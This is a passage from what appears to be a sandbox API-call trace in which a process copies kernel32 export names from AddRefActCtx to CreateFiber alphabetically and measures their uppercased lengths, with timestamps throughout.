(lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.846] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.846] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.846] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.846] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.846] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.846] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.846] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.846] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.846] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.846] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.846] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.846] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.846] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.846] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.846] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.846] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.846] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.847] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.847] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.847] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.847] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.847] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.847] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.847] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.847] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.847] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.847] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.847] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.847] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.847] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.847] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.847] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.847] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.847] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.847] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.847] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.848] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.848] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.848] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.848] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.848] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.848] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.848] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.848] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.848] lstrlenA (lpString="BEEP") returned 4 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.848] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.848] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.848] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.848] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.848] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.848] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.848] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.848] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.848] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.848] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.849] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.849] lstrlenA (lpString="CANCELIO") returned 8 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.849] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.849] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.849] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.849] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.849] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.849] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.849] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.849] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.849] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.849] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.849] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.849] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.849] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.849] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.849] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.849] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.849] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.850] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.850] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.850] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.850] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.850] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.850] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.850] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.850] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.850] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.850] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.850] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.850] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.850] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.850] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.850] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.850] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.850] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.850] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.850] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.851] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.851] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.851] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.851] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.851] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.851] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.851] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.851] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.851] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.851] lstrlenA (lpString="COPYFILEA") returned 9 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.851] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.851] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.851] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.851] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.851] lstrlenA (lpString="COPYFILEW") returned 9 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.851] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.851] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.851] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.851] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.852] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.852] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.852] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.852] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.852] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.852] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.852] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.852] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.852] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.852] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.852] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.852] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | 